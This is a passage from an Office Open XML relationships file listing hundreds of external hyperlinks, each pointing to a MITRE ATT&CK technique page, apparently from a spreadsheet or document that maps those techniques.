Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/004" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1610" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/002" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/005" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/011" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/005" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/003" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/005" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1570" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/004" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/002" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/009" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/001" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/002" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/001" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/007" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/002" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1185" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/003" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/002" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/001" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/001" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/004" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/007" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/002" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/008" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/003" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/003" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1619" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/006" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/002" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/001" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/003" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/003" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/003" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/003" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/004" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/001" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/013" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/002" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/006" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/002" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/003" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/001" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/007" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1529" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/001" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/002" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/006" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/002" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/003" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/013" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/001" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/002" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/008" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/007" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1594" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/001" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/002" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/013" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1609" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1486" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/002" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/002" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/004" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/002" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/004" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/002" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/005" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/002" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/002" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/002" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/009" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/002" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/004" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/001" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/001" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/001" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/003" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/008" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/001" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/009" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/005" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/002" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/002" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/002" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/003" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/002" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/001" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/002" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/001" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/009" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/003" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/002" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/001" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/004" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/001" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1613" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/003" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/002" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/010" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/002" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/003" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016/001" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/003" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/015" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/002" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1039" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/001" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/001" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/002" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/002" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/004" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/003" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/001" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/010" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/013" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/001" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/006" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/002" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/004" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518/001" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/007" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1080" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1554" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/003" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1030" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/004" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/001" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/001" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/004" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/001" TargetMode="External"/><Relationship Id="rId374" 